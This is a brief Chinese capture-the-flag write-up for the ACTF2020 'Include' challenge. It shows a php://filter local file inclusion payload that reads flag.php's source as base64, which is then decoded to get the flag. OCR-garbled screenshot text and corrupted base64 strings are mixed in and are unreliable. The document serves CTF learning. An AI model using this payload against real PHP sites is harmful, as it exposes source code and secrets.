[ACTF2020新生赛]Include-526互联

[ACTF2020 新生赛**]Include**

c O a c7ffc310-47d1-4673-9e3c-e53af99bb7ce.node4. buuoj.cn:81 Linux win Ows Can you find out the flag? Q HTML head < / html > D centos DR D Git HackBar

由于是file伪协议打开flag.php文件可能存在文件漏洞

进入发现没有flag

进行猜测flag存在flag.php源代码中

可以利用php://filter伪协议来查看flag.php的源代码，

构造payload：?file=php://filter/convert.base64-encode/resource=flag.php

看到文件

PD9waHAKZWNobyAiQ2FulHlvdSBmaW5klG91dCBOaGUgZmxhZz8iOwovL2ZsYWd7Yzc4M2RkODgtY2E5YSOOYjAwLTkxYWUtZTdmYWMxNTlmMjcOfQo= HackBar q HTML P09waHAKNNobyAiQ2F ulH1vdsgmawSk1Gg1dcgeaGUgZmxhZz8i0wov L2Zsywd7Yzc4m2RkOOgtY2ESvseeyjAuL dmnelxN1 Imm5cafQo- :hov

把字符串拿去base64解码

得到flag

backupfile新生actf 2020

usualcrypt新生actf 2020